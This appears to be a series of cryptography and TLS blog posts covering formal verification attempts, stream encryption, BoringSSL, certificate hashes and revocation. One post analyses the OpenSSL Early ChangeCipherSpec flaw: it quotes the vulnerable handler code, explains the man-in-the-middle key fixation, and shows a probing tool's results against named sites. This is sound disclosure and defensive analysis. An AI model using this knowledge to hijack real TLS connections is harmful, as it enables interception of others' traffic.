int add(int a, int b) {
  return a+b;
}

That fits SeL4's C subset (called StrictC - see l4v/tools/c-parser/doc in the SeL4 source) and results in this Simpl construct (you'll need to read the Simpl paper to really understand it):

test_global_addresses.add_body ≡
TRY
  Guard SignedArithmetic ⦃-2147483648 ≤ sint ´a + sint ´b ∧ sint ´a + sint ´b ≤ 2147483647⦄
   (creturn global_exn_var_'_update ret__int_'_update (λs. a_' s + b_' s));;
  Guard DontReach {} SKIP
CATCH SKIP
END

There's clearly an overflow check in there, which is good, but to call the process of starting to prove things about it intimidating to the beginner would be an understatement. That and the oddities of the C subset motivated me to look further.

Dependent types are closely related to this problem so I checked Wikipedia for the dependently typed languages which support imperative programming and that are still active. That's just ATS and F*, according to that table. ATS doesn't deal with overflows and, while F*/F7 is worthy of a look because of miTLS, it's a CLR language and so not applicable here.

Next up, based on searches, is SPARK. SPARK is a subset of Ada designed for verification. There's a commercial company behind it, but versions are published under the GPL. It even comes with an IDE.

SPARK uses an SMT solver to prove correctness, which is very different from a proof in Isabelle. While an Isabelle proof is, by construction, just an application of axioms and rules of inference, an SMT solver is essentially a magic box into which you feed a proposition and out of which (maybe) comes a true/false answer. Trusting in an SMT solver is much, much stronger than not doing so, but it is a step down from a formal proof system. SPARK uses a version of Why3 to abstract over SMT solvers and we'll discuss Why3 more later.

Anyway, here's the same, trivial function in Ada:

function Add(X, Y : in Integer_32) return Integer_32 is
begin
   return X + Y;
end Add;

If we ask SPARK to process that then it generates verification conditions (VCs): one for each possible thing that could go wrong - overflow, array indexing etc. For that code it throws an error saying that X + Y might overflow, which is promising! In order to eliminate that, one needs to prove the verification condition that says that the addition is safe by adding preconditions to the function (which then become VCs at each callsite):

function Add(X, Y : in Integer_32) return Integer_32 with
  Pre => X < 2**30 and X > -2*30 and Y < 2**30 and Y > -2**30;

With that precondition, the function is accepted. I should note that this is SPARK 2014; there are many older versions (SPARK has been going for a long time) and they kept preconditions and the like in comments. Lots of pages about SPARK still talk about the older versions and major projects in SPARK (like Ironsides - a DNS server) still use the older versions.

With that initial success, let's try something a tiny bit more involved. Curve25519 deals with 255-bit integers but CPUs don't. So, in the same way that a 64-int integer could be represented with a pair of 32-bit integers, 255-bit integers are represented in Donna with ten, 32-bit integers. This representation is a little odd because the values aren't spaced at 32-bit multiples, but rather at alternating 26 and 25 bit positions. That also means that the representation is non-unique (setting bit 26 of the first word is equal to setting bit zero of the second) and that's done for performance. See this for more details, but it's not important right now.

Adding these 255-bit integers is done simply by adding the underlying words without carry, with suitable bounds on the inputs so that overflow doesn't happen:

type Ints is array (Integer range 0 .. 9) of Integer_32;

function Add (X, Y : in Ints) return Ints with
   Pre => (for all i in Ints'Range => X(i) < 2**30 and X(i) > -2**30 and Y(i) < 2**30 and Y(i) > -2**30),
   Post => (for all i in Ints'Range => Add'Result(i) = X(i) + Y(i));

function Add (X, Y : in Ints) return Ints is
   Sum : Ints;
begin
   for i in Ints'Range loop
      Sum(i) := X(i) + Y(i);
   end loop;

   return Sum;
end Add;

That mostly works, but SPARK can't prove that the result is X(i) + Y(i) for all i despite it being exactly what the function says. One really needs to spoon feed the prover: in this case with a loop invariant in the for loop:

for i in Ints'Range loop
   pragma Loop_Invariant (for all j in Ints'First .. i-1 => Sum(j) = X(j) + Y(j));
   Sum(i) := X(i) + Y(i);
end loop;

Sadly, that doesn't work either, despite being correct, because SPARK doesn't seem to like i-1 when i might be zero. So, trying again:

for i in Ints'Range loop
   Sum(i) := X(i) + Y(i);
   pragma Loop_Invariant (for all j in Ints'First .. i => Sum(j) = X(j) + Y(j));
end loop;

That one works, but now SPARK isn't sure whether uninitialised elements of Sum are being referenced. The property of being initialised isn't part of SPARK's logic and seems that the only way to proceed here is to disable that warning!

But, there's some promise! We would now like to show a higher level property of Add: that the 255-bit integer that the returned array represents is the sum of the integers that the input arrays represent. This means that the logic needs to deal with arbitrary integers and that we need to write a function in the logic that turns an array into an abstract integer.

Enabling arbitrary integers in the logic is possible (although good luck finding how to do it in the documentation: the answer is to put a file called gnat.adc in the gnatprove subdirectory of the project containing pragma Overflow_Mode (General => Strict, Assertions => Eliminated);). However, I failed at writing functions in the logic without dropping down into code and triggering overflow checks. It appears that ghost functions should be able to do this but, after getting the answer to a documentation bug on StackOverflow, actually trying to use any logic functions, even the identity function, caused the proof not to terminate. SPARK claims to be able to use Isabelle for proofs but I couldn't get that to work at all: strace says that the .thy file isn't ever written.

Stuck, I moved on from SPARK and tried Frama-C and its Jessie plugin. Even if SPARK was working for me, using C (even a subset) has advantages: it's convenient to use in other projects, there exist verified compilers for it and there's an extension to CompCert that allows for static verification of constant-time behaviour (although I've lost the paper!)

So here's the same function in Frama-C:

/*@ requires \valid_range(out, 0, 9);
  @ requires \valid_range(x, 0, 9);
  @ requires \valid_range(y, 0, 9);
  @ requires \forall integer i; 0 <= i < 10 ==>
      (x[i] > -1000 && x[i] < 1000);
  @ requires \forall integer i; 0 <= i < 10 ==>
      (y[i] > -1000 && y[i] < 1000);
  @ ensures \forall integer i; 0 <= i < 10 ==> (out[i] == x[i] + y[i]);
*/
void add(int *out, const int *x, const int *y) {
  /*@ loop invariant i >= 0 && i <= 10 &&
        (\forall integer j; 0 <= j < i ==> out[j] == x[j] + y[j]);
    @ loop variant 10-i;
    */
  for (int i = 0; i < 10; i++) {
    out[i] = x[i] + y[i];
  }
}

Note that this time we not only need a loop invariant to show the postcondition, but we also need a loop variant to show that the for loop terminates: you really need to spoon feed the verification! But Frama-C/Jessie has no problem with functions in the logic:

/*@ logic integer felemvalue (int *x) =
      x[0] + x[1] * (1 << 26) + x[2] * (1 << 51) + x[3] * (1 << 77) +
      x[4] * (1 << 102) + x[5] * 340282366920938463463374607431768211456 +
      x[6] * 11417981541647679048466287755595961091061972992 +
      x[7] * 766247770432944429179173513575154591809369561091801088 +
      x[8] * 25711008708143844408671393477458601640355247900524685364822016 +
      x[9] * 1725436586697640946858688965569256363112777243042596638790631055949824; */

That function maps from an array to the abstract integer that it represents. Note that the terms switched from using shifts to represent the constants to literal numbers. That's because the proof process suddenly became non-terminating (in a reasonable time) once the values reached about 104-bits, but the literals still worked.

With that logic function in hand, the we can easily prove the higher-level concept that we wanted as a post condition of the add function:

@ ensures felemvalue(out) == felemvalue(x) + felemvalue(y);

Flushed with success, I moved onto the next most basic function: multiplication of 255-bit integers. The code that Donna uses is the textbook, polynomial multiplication code. Here's how the function starts:

/* Multiply two numbers: output = in2 * in
 *
 * output must be distinct to both inputs. The inputs are reduced coefficient
 * form, the output is not.
 *
 * output[x] <= 14 * the largest product of the input limbs. */
static void fproduct(limb *output, const limb *in2, const limb *in) {
  output[0] =       ((limb) ((s32) in2[0])) * ((s32) in[0]);
  output[1] =       ((limb) ((s32) in2[0])) * ((s32) in[1]) +
                    ((limb) ((s32) in2[1])) * ((s32) in[0]);
  output[2] =  2 *  ((limb) ((s32) in2[1])) * ((s32) in[1]) +
                    ((limb) ((s32) in2[0])) * ((s32) in[2]) +
                    ((limb) ((s32) in2[2])) * ((s32) in[0]);
  …

Each of the lines is casting a 64-bit number down to 32 bits and then doing a 32×32⇒64 multiplication. (The casts down to 32 bits are just to tell the compiler not to waste time on a 64×64⇒64 multiplication.) In Frama-C/Jessie we need to show that the casts are safe, multiplications don't overflow and nor do the sums and multiplications by two etc. This should be easy. Here are the preconditions that set the bounds on the input.

/*@ requires \valid_range(output, 0, 18);
  @ requires \valid_range(in, 0, 9);
  @ requires \valid_range(in2, 0, 9);
  @ requires \forall integer i; 0 <= i < 10 ==> -134217728 < in[i] < 134217728;
  @ requires \forall integer i; 0 <= i < 10 ==> -134217728 < in2[i] < 134217728;
*/

However, Why3, which is the prover backend that Jessie (and SPARK) uses, quickly gets bogged down. In an attempt to help it out, I moved the casts to the beginning of the function and put the results in arrays so that the code was less complex.

As you can see in the Jessie documentation, the Why3 UI allows one to do transforms on the verification conditions to try and make life easier for the prover. Quickly, splitting a requirement becomes necessary. But this throws away a lot of information. In this case, each of the 32×32⇒64 multiplications is assumed to fit only within its bounds and so the intermediate bounds need to be reestablished every time. This means that the equations have to be split like this:

limb t, t2;
t = ((limb) in2_32[0]) * in_32[1];
//@ assert -18014398509481984 < t < 18014398509481984;
t2 = ((limb) in2_32[1]) * in_32[0];
//@ assert -18014398509481984 < t2 < 18014398509481984;
output[1] = t + t2;

That's only a minor problem really, but the further one goes into the function, the harder the prover needs to work for some reason. It's unclear why because every multiplication has the same bounds - they are all instances of the same proof. But it's very clear that the later multiplications are causing more work.

Why3 is an abstraction layer for SMT solvers and a large number are supported (see “External provers” on its homepage for a list). I tried quite a few and, for this task, Z3 is clearly the best with CVC4 coming in second. However, Z3 has a non-commercial license which is very worrying - does that mean that a verified version of Curve25519 that used Z3 has to also have a non-commercial license? So I stuck to using CVC4.

However, about a quarter of the way into the function, both CVC4 and Z3 are stuck. Despite the bounds being a trivial problem, and just instances of the same problem that they can solve at the beginning of the function, somehow either Why3 is doing something bad or the SMT solvers are failing to discard irrelevant facts. I left it running overnight and Z3 solved one more instance after six hours but achieved nothing after 12 hours on the next one. Splitting and inlining the problem further in the Why3 GUI didn't help either.

Like SPARK, Jessie can use Isabelle for proofs too (and for the same reason: they are both using Why3, which supports Isabelle as a backend). It even worked this time, once I added Real to the Isabelle imports. However, in the same way that the C parser in Isabelle was an ML function that created Isabelle objects internally, the Why3 connection to Isabelle is a function (why3_open) that parses an XML file. This means that the proof has large numbers of generated variable names (o33, o34, etc) and you have no idea which intermediate values they are. Additionally, the bounds problem is something that Isabelle could have solved automatically, but the assumptions that you can use are similarly autonamed as things like local.H165. In short, the Isabelle integration appears to be unworkable.

Perhaps I could split up each statement in the original code into a separate function and then write the statement again in the logic in order in order to show the higher level properties, but at some point you have to accept that you're not going to be able to dig this hole with a plastic spoon.

Conclusion

The conclusion is a bit disappointing really: Curve25519 has no side effects and performs no allocation, it's a pure function that should be highly amenable to verification and yet I've been unable to find anything that can get even 20 lines into it. Some of this might be my own stupidity, but I put a fair amount of work into trying to find something that worked.

There seems to be a lot of promise in the area and some pieces work well (SMT solvers are often quite impressive, the Frama-C framework appears to be solid, Isabelle is quite pleasant) but nothing I found worked well together, at least for verifying C code. That makes efforts like SeL4 and Ironsides even more impressive. However, if you're happy to work at a higher level I'm guessing that verifying functional programs is a lot easier going.

HSTS for new TLDs

Whatever you might think of them, the new TLDs are rapidly arriving. New TLDs approved so far this month include alsace, sarl, iinet, poker, gifts, restaurant, fashion, tui and allfinanz. The full list for last month is over twice as long.

That means that there's lots of people currently trying to figure out how to differentiate themselves from other TLDs. Here's an idea: why not ask me to set HSTS for the entire TLD? That way, every single site runs over HTTPS, always. It strikes me that could be useful if you're trying to build trust with users unfamiliar with the zoo of new domains.

(I can't speak for Firefox and Safari but I think it's safe to assume that Firefox would be on board with this. It's still unclear whether IE's support for HSTS will include preloading.)

I'm guessing that, with such a large number of new TLDs, I should be able to reach at least some operators of them via this blog post.

Encrypting streams

When sending data over the network, chunking is pretty much a given. TLS has a maximum record size of 16KB and this fits neatly with authenticated encryption APIs which all operate on an entire message at once.

But file encryption frequently gets this wrong. Take OpenPGP: it bulk encrypts the data and sticks a single MAC on the end. Ideally everyone is decrypting to a temporary file and waiting until the decryption and verification is complete before touching the plaintext, but it takes a few seconds of searching to find people suggesting commands like this:

gpg -d your_archive.tgz.gpg | tar xz

With that construction, tar receives unauthenticated input and will happily extract it to the filesystem. An attacker doesn't (we assume) know the secret key, but they can guess at the structure of the plaintext and flip bits in the ciphertext. Bit flips in the ciphertext will produce a corresponding bit flip in the plaintext, followed by randomising the next block. I bet some smart attacker can do useful things with that ability. Sure the gpg command will exit with an error code, but do you think that the shell script writer carefully handled that case and undid the changes to the filesystem?

The flaw here isn't in CFB mode's malleability, but in OpenPGP forcing the use of unauthenticated plaintext in practical situations. (Indeed, if you are ever thinking about the malleability of ciphertext, you have probably already lost.)

I will even claim that the existance of an API that can operate in a streaming fashion over large records (i.e. will encrypt and defer the authenticator and will decrypt and return unauthenticated plaintext) is a mistake. Not only is it too easy to misunderstand and misuse (like the gpg example above) but, even if correctly buffered in a particular implementation, the existance of large records may force other implementations to do dangerous things because of a lack of buffer space.

If large messages are chunked at 16KB then the overhead of sixteen bytes of authenticator for every chunk is only 0.1%. Additionally, you can safely stream the decryption (as long as you can cope with truncation of the plaintext).

Although safer in general, when chunking one has to worry that an attacker hasn't reordered chunks, hasn't dropped chunks from the start and hasn't dropped chunks from the end. But sadly there's not a standard construction for taking an AEAD and making a scheme suitable for encrypting large files (AERO might be close, but it's not quite what I have in mind). Ideally such a scheme would take an AEAD and produce something very like an AEAD in that it takes a key, nonce and additional data, but can safely work in a streaming fashion. I don't think it need be very complex: take 64 bits of the nonce from the underlying AEAD as the chunk number, always start with chunk number zero and feed the additional data into chunk zero with a zero byte prefix. Prefix each chunk ciphertext with a 16 bit length and set the MSB to indicate the last chunk and authenticate that indication by setting the additional data to a single, 1 byte. The major worry might be that for many underlying AEADs, taking 64 bits of the nonce for the chunk counter leaves one with very little (or none!) left.

That requires more thought before using it for real but, if you are ever building encryption-at-rest, please don't mess it up like we did 20 years ago. (Although, even with that better design, piping the output into tar may still be unwise because an attacker can truncate the stream at a chunk boundary: perhaps eliminating important files in the process.)

Update: On Twitter, zooko points to Tahoe-LAFS as an example of getting it right. Additionally, taking the MAC of the current state of a digest operation and continuing the operation has been proposed for sponge functions (like SHA-3) under the name MAC-and-continue. The exact provenance of this isn't clear, but I think it might have been from the Keccak team in this paper. Although MAC-and-continue doesn't allow random access, which might be important for some situations.

BoringSSL

Earlier this year, before Apple had too many goto fails and GnuTLS had too few, before everyone learnt that TLS heart-beat messages were a thing and that some bugs are really old, I started a tidy up of the OpenSSL code that we use at Google.

We have used a number of patches on top of OpenSSL for many years. Some of them have been accepted into the main OpenSSL repository, but many of them don’t mesh with OpenSSL’s guarantee of API and ABI stability and many of them are a little too experimental.

But as Android, Chrome and other products have started to need some subset of these patches, things have grown very complex. The effort involved in keeping all these patches (and there are more than 70 at the moment) straight across multiple code bases is getting to be too much.

So we’re switching models to one where we import changes from OpenSSL rather than rebasing on top of them. The result of that will start to appear in the Chromium repository soon and, over time, we hope to use it in Android and internally too.

There are no guarantees of API or ABI stability with this code: we are not aiming to replace OpenSSL as an open-source project. We will still be sending them bug fixes when we find them and we will be importing changes from upstream. Also, we will still be funding the Core Infrastructure Initiative and the OpenBSD Foundation.

But we’ll also be more able to import changes from LibreSSL and they are welcome to take changes from us. We have already relicensed some of our prior contributions to OpenSSL under an ISC license at their request and completely new code that we write will also be so licensed.

(Note: the name is aspirational and not yet a promise.)

Early ChangeCipherSpec Attack

OpenSSL 1.0.1h (and others) were released today with a scary looking security advisiory and that's always an event worth looking into. (Hopefully people are practiced at updating OpenSSL now!)

Update: the original reporter has a blog post up. Also, I won't, personally, be answering questions about specific Google services. (I cut this blog post together from notes that I'm writing for internal groups to evaluate and this is still very fresh.)

Update: my initial thoughts from looking at the diff still seem to be holding up. Someone is welcome to write a more detailed analysis than below. HP/ZDI have a write up of one of the DTLS issues.

There are some critical bug fixes to DTLS (TLS over datagram transports, i.e. UDP), but most people will be more concerned about the MITM attack against TLS (CVE-2014-0224).

The code changes are around the rejection of ChangeCipherSpec messages, which are messages sent during the TLS handshake that mark the change from unencrypted to encrypted traffic. These messages aren't part of the handshake protocol itself and aren't linked into the handshake state machine in OpenSSL. Rather there's a check in the code that they are only received when a new cipher is ready to be used. However, that check (for s->s3->tmp.new_cipher in s3_pkt.c) seems reasonable, but new_cipher is actually set as soon as the cipher for the connection has been decided (i.e. once the ServerHello message has been sent/received), not when the cipher is actually ready! It looks like this is the problem that's getting fixed in this release.

Here's the code in question that handles a ChangeCipherSpec message:

int ssl3_do_change_cipher_spec(SSL *s)
	{
	int i;
	const char *sender;
	int slen;

	if (s->state & SSL_ST_ACCEPT)
		i=SSL3_CHANGE_CIPHER_SERVER_READ;
	else
		i=SSL3_CHANGE_CIPHER_CLIENT_READ;

	if (s->s3->tmp.key_block == NULL)1
		{
		if (s->session == NULL)
			{
			/* might happen if dtls1_read_bytes() calls this */
			SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC,SSL_R_CCS_RECEIVED_EARLY);
			return (0);
			}

		s->session->cipher=s->s3->tmp.new_cipher;
		if (!s->method->ssl3_enc->setup_key_block(s)) return(0); 2
		}

	if (!s->method->ssl3_enc->change_cipher_state(s,i))
		return(0);

	/* we have to record the message digest at
	 * this point so we can get it before we read
	 * the finished message */
	if (s->state & SSL_ST_CONNECT)
		{
		sender=s->method->ssl3_enc->server_finished_label;
		slen=s->method->ssl3_enc->server_finished_label_len;
		}
	else
		{
		sender=s->method->ssl3_enc->client_finished_label;
		slen=s->method->ssl3_enc->client_finished_label_len;
		}

	i = s->method->ssl3_enc->final_finish_mac(s,
		sender,slen,s->s3->tmp.peer_finish_md); 3
	if (i == 0)
		{
		SSLerr(SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC, ERR_R_INTERNAL_ERROR);
		return 0;
		}
	s->s3->tmp.peer_finish_md_len = i;

	return(1);
	}

If a ChangeCipherSpec message is injected into the connection after the ServerHello, but before the master secret has been generated, then ssl3_do_change_cipher_spec will generate the keys (2) and the expected Finished hash (3) for the handshake with an empty master secret. This means that both are based only on public information. Additionally, the keys will be latched because of the check at (1) - further ChangeCipherSpec messages will regenerate the expected Finished hash, but not the keys.

The oldest source code on the OpenSSL site is for 0.9.1c (Dec 28, 1998) and the affected code appears almost unchanged. So it looks like this bug has existed for 15+ years.

The implications of this are pretty complex.

For a client there's an additional check in the code that requires that a CCS message appear before the Finished and after the master secret has been generated. An attacker can still inject an early CCS too and the keys will be calculated with an empty master secret. Those keys will be latched - another CCS won't cause them to be recalculated. However, when sending the second CCS that the client code requires, the Finished hash is recalculated with the correct master secret. This means that the attacker can't fabricate an acceptable Finished hash. This stops the obvious, generic impersonation attack against the client.

For a server, there's no such check and it appears to be possible to send an early CCS message and then fabricate the Finished hash because it's based on an empty master secret. However, that doesn't obviously gain an attacker anything. It would be interesting if a connection with a client certificate could be hijacked, but there is a check in ssl3_get_cert_verify that a CCS hasn't been already processed so that isn't possible.

Someone may be able to do something more creative with this bug; I'm not ruling out that there might be other implications.

Things change with an OpenSSL 1.0.1 server however. In 1.0.1, a patch of mine was included that moves the point where Finished values are calculated. The server will now use the correct Finished hash even if it erroneously processed a CCS, but this interacts badly with this bug. The server code (unlike the client) won't accept two CCS messages in a handshake. So, if an attacker injects an early CCS at the server to fixate the bad keys, then it's not possible for them to send a second in order to get it to calculate the correct Finished hash. But with 1.0.1, the server will use the correct Finished hash and will reply with the correct hash to the client. This explains the 1.0.1 and 1.0.2 mention in the advisory. With any OpenSSL client talking to an OpenSSL 1.0.1 server, an attacker can inject CCS messages to fixate the bad keys at both ends but the Finished hashes will still line up. So it's possible for the attacker to decrypt and/or hijack the connection completely.

The good news is that these attacks need man-in-the-middle position against the victim and that non-OpenSSL clients (IE, Firefox, Chrome on Desktop and iOS, Safari etc) aren't affected. None the less, all OpenSSL users should be updating.

Update: I hacked up the Go TLS library to perform the broken handshake in both 0.9.8/1.0.0 and 1.0.1 modes. There's a patch for crypto/tls and a tool that will attempt to do those broken handshakes and tell you if either worked. For example (at the time of writing):

$ ./earlyccs_check google.com
Handshake failed with error: remote error: unexpected message
Looks ok.
$ ./earlyccs_check github.com
Server is affected (1.0.1).
$ ./earlyccs_check amazon.com
Server is affected (0.9.8 or 1.0.0).

Matching primitive strengths

It's a common, and traditional, habit to match the strengths of cryptographic primitives. For example, one might design at the 128-bit security level and pick AES-128, SHA-256 and P-256. Or if someone wants “better” security, one might target a 192-bit security level with AES-192, SHA-384 and P-384. NIST does this sort of thing, for example in 800-57/3, section 5.2.

The logic underlying this is that an attacker will attack at a system's weakest point, so anything that is stronger than the weakest part is a waste. But, while matching up the security level might have made sense in the past, I think it warrants reconsideration now.

Consider the energy needed to do any operation 2128 times: Landauer tells us that erasing a bit takes a minimum amount of energy any actual crypto function will involve erasing many bits. But, for the sake of argument, let's say that we're doing a single bit XOR. If we take the minimum energy at room temperature (to save energy on refrigeration) we get 2.85×10-21 × 2128 = 0.97×1018J. That's about “yearly electricity consumption of South Korea as of 2009” according to Wikipedia. If we consider that actually doing anything useful in each of those 2128 steps is going to take orders of magnitude more bit operations, and that we can't build a computer anywhere near the theoretic limit, we can easily reach, say, 5.5×1024J, which is “total energy from the Sun that strikes the face of the Earth each year”.

(The original version of this post discussed incrementing a 128-bit counter and said that it took two erasures per increment. Samuel Neves on Twitter pointed out that incrementing the counter doesn't involve destroying the information of the old value and several people pointed out that one can hit all the bit-patterns with a Gray code and thus only need to flip a single bit each time. So I changed the above to use a one-bit XOR as the basic argument still holds.)

So any primitive at or above the 128-bit security level is equally matched today, because they are all effectively infinitely strong.

One way to take this is to say that anything above 128 bits is a waste of time. Another is to say that one might want to use primitives above that level, but based on the hope that discontiguous advances leave it standing but not the lesser primitives. The latter involves a lot more guesswork than the old practice of making the security levels match up. Additionally, I don't think most people would think that an analytic result is equally likely for all classes of primitives, so one probably doesn't want to spend equal amounts of them all.

Consider the difference between P-256 and P-384 (or curve25519 and Curve41417 or Hamburg's Goldilocks-448). If they are all infinitely strong today then the reason to want to use a larger curve is because you expect some breakthrough, but not too much of a breakthrough. Discrete log in an elliptic-curve group is a square-root work function today. For those larger curves to make sense you have to worry about a breakthrough that can do it in cube-root time, but not really forth-root and certainly not fifth-root. How much would you pay to insure yourself against that, precise possibility? And how does that compare against the risk of a similar breakthrough in AES?

It is also worth considering whether the security-level is defined in a way matches your needs. AES-128 is generally agreed to have a 128-bit security level, but if an attacker is happy breaking any one of 2n keys then they can realise a significant speedup. An “unbalanced” choice of cipher key size might be reasonable if that attack is a concern.

So maybe a 256-bit cipher (ciphers do pretty well now, just worry about Grover's algorithm), SHA-384 (SHA-256 should be fine, but hash functions have, historically, had a bad time) and 128512(? see below)-bit McEliece is actually “balanced” these days.

(Thanks to Mike Hamburg and Trevor Perrin, with whom I was discussing this after Mike presented his Goldilocks curve. Thanks to JP Aumasson on Twitter and pbsd on HN for suggesting multi-target attacks as a motivation for large cipher key sizes. Also to pbsd for pointing out a quantum attack against McEliece that I wasn't aware of.)

SHA-256 certificates are coming

It's a neat result in cryptography that you can build a secure hash function given a secure signature scheme, and you can build a secure signature scheme given a secure hash function. However, far from the theory, in the real world, lots of signatures today depend on SHA-1, which is looking increasingly less like a secure hash function.

There are lots of properties by which one can evaluate a hash function, but the most important are preimage resistance (if I give you a hash, can you find an input with that hash value?), second preimage resistance (if I give you a message, can you find another that hashes to the same value?) and collision resistance (can you find two messages with the same hash?). Of those, the third appears to be much harder to meet than the first two, based on historical results against hash functions.

Back when certificates were signed with MD5, a chosen-prefix collision attack (i.e. given two messages, can you append different data to each so that the results have the same hash?) against MD5 was used at least twice to break the security of the PKI. First the MD5 Collisions Inc demo against RapidSSL and then the Flame malware.

Today, SHA-1 is at the point where a collision attack is estimated to take 261 work and a chosen-prefix collision to take 277. Both are below the design strength of 280 and even that design strength isn't great by today's standards.

We hope that we have a second line of defense for SHA-1: after the MD5 Collisions Inc demo, CAs were required to use random serial numbers. A chosen-prefix attack requires being able to predict the certificate contents that will be signed and the random serial number should thwart that. With random serials we should be resting on a stronger hash function property called target-collision resistance. (Although I'm not aware of any proofs that random serials actually put us on TCR.)

Still, it would be better not to depend on those band-aids and to use a hash function with a better design strength while we do it. So certificates are starting to switch to using SHA-256. A large part of that shift came from Microsoft forbidding certificates using SHA-1 starting in 2016.

For most people, this will have no effect. Twitter ended up with a SHA-256 certificate after they replaced their old one because of the OpenSSL heartbeat bug. So, if you can still load Twitter's site, then you're fine.

But there are a lot of people using Windows XP prior to Service Pack 3, and they will have problems. We've already seen lots of user reports of issues with Twitter (and other sites) from these users. Wherever possible, installing SP3 is the answer. (Or, better yet, updating from Windows XP.)

There are also likely to be problems with embedded clients, old phones etc. Some of these may not come to light for a while.

We've not yet decided what Google's timeline for switching is, but we will be switching prior to 2016. If you've involved with a something embedded that speaks to Google over HTTPS (and there's a lot of it), now is the time to test https://cert-test.sandbox.google.com, which is using a SHA-256 certificate. I'll be using other channels to contact the groups that we know about but, on the web, we don't always know what's talking to us.

Revocation still doesn't work

I was hoping to be done with revocation for a bit, but sadly not.

GRC have published a breathless piece attacking a straw man argument: “Google tells us ... that Chrome's unique CRLSet solution provides all the protection we need”. I call it a straw man because I need only quote my own posts that GRC have read to show it.

The original CRLSets announcement contained two points. Firstly that online revocation checking doesn't work and that we were switching it off in Chrome in most cases. Secondly, that we would be using CRLSets to avoid having to do full binary updates in order to respond to emergency incidents.

In the last two paragraphs I mentioned something else. Quoting myself:

“Since we're pushing a list of revoked certificates anyway, we would like to invite CAs to contribute their revoked certificates (CRLs) to the list. We have to be mindful of size, but the vast majority of revocations happen for purely administrative reasons and can be excluded. So, if we can get the details of the more important revocations, we can improve user security. Our criteria for including revocations are:

  1. The CRL must be crawlable: we must be able to fetch it over HTTP and robots.txt must not exclude GoogleBot.
  2. The CRL must be valid by RFC 5280 and none of the serial numbers may be negative.
  3. CRLs that cover EV certificates are taken in preference, while still considering point (4).
  4. CRLs that include revocation reasons can be filtered to take less space and are preferred.”

In short, since we were pushing revocations anyway, maybe we could get some extra benefit from it. It would be better than nothing, which is what browsers otherwise have with soft-fail revocation checking.

I mentioned it again, last week (emphasis added):

“We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do.”

“The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened.”

And yet, GRC managed to write pages (including cartoons!) exposing the fact that it doesn't cover many revocations and attacking Chrome for it.

They also claim that soft-fail revocation checking is effective:

The claim is that a user will download and cache a CRL while not being attacked and then be protected from a local attacker using a certificate that was included on that CRL. (I'm paraphrasing; you can search for “A typical Internet user” in their article for the original.)

There are two protocols used in online revocation checking: OCSP and CRL. The problem is that OCSP only covers a single certificate and OCSP is used in preference because it's so much smaller and thus removes the need to download CRLs. So the user isn't expected to download and cache the CRL anyway. So that doesn't work.

However, it's clear that someone is downloading CRLs because Cloudflare are spending half a million dollars a month to serve CRLs. Possibly it's non-browser clients but the bulk is probably CAPI (the library that IE, Chrome and other software on Windows typically uses - although not Firefox). A very obscure fact about CAPI is that it will download a CRL when it has 50 or more OCSP responses cached for a given CA certificate. But CAs know this and split their CRLs so that they don't get hit with huge bandwidth bills. But a split CRL renders the claimed protection from caching ineffective, because the old certificate for a given site is probably in a different part.

So I think the claim is that doing blocking OCSP lookups is a good idea because, if you use CAPI on Windows, then you might cache 50 OCSP responses for a given CA certificate. Then you'll download and cache a CRL for a while and then, depending on whether the CA splits their CRLs, you might have some revocations cached for a site that you visit.

It seems that argument is actually for something like CRLSets (download and cache revocations) over online checking, it's just a Rube Goldberg machine to, perhaps, implement it!

So, once again, revocation doesn't work. It doesn't work in other browsers and CRLSets aren't going to cover much in Chrome, as I've always said. GRC's conclusions follow from those errors and end up predictably far from the mark.

In order to make this post a little less depressing, let's consider whether its reasonable to aim to cover everything with CRLSets. (Which I mentioned before as well, but I'll omit the quote.) GRC quote numbers from Netcraft claiming 2.85 million revocations, although some are from certificate authorities not trusted by mainstream web browsers. I spent a few minutes harvesting CRLs from the CT log. This only includes certificates that are trusted by reasonable number of people and I only waited for half the log to download. From that half I threw in the CRLs included by CRLSets and got 2356 URLs after discarding LDAP ones.

I tried downloading them and got 2164 files. I parsed them and eliminated duplicates and my quick-and-dirty parser skipped quite a few. None the less, this very casual search found 1,062 issuers and 4.2 million revocations. If they were all dropped into the CRLSet, it would take 39MB.

So that's a ballpark figure, but we need to design for something that will last a few years. I didn't find figures on the growth of HTTPS sites, but Netcraft say that the number of web sites overall is growing at 37% a year. It seems reasonable that the number of HTTPS sites, thus certificates, thus revocations will double a couple of times in the next five years.

There's also the fact that if we subsidise revocation with the bandwidth and computers of users, then demand for revocation will likely increase. Symantec, I believe, have experimented with certificates that are issued for the maximum time (five years at the moment) but sold in single year increments. When it comes to the end of the year, they'll remind you to renew. If you do, you don't need to do anything, otherwise the certificate gets revoked. This seems like a good deal for the CA so, if we make revocation really effective, I'd expect to see a lot more of it. Perhaps factor in another doubling for that.

So we would need to scale to ~35M revocations in five years, which is ~300MB of raw data. That would need to be pushed to all users and delta updated. (I don't have numbers for the daily delta size.)

That would obviously take a lot of bandwidth and a lot of resources on the client. We would really need to aim at mobile as well, because that is likely to be the dominant HTTPS client in a few years, making storage and bandwidth use even more expensive.

Some probabilistic data structure might help. I've written about that before. Then you have to worry about false positives and the number of reads needed per validation. Phones might use Flash for storage, but it's remarkably slow.

Also, would you rather spend those resources on revocation, or on distributing the Safe Browsing set to mobile devices? Or would you spend the memory on improving ASLR on mobile devices? Security is big picture full of trade-offs. It's not clear the revocation warrants all that spending.

So, if you believe that downloading and caching revocation is the way forward, I think those are the parameters that you have to deal with.

No, don't enable revocation checking

Revocation checking is in the news again because of a large number of revocations resulting from precautionary rotations for servers affected by the OpenSSL heartbeat bug. However, revocation checking is a complex topic and there's a fair amount of misinformation around. In short, it doesn't work and you are no more secure by switching it on. But let's quickly catch up on the background:

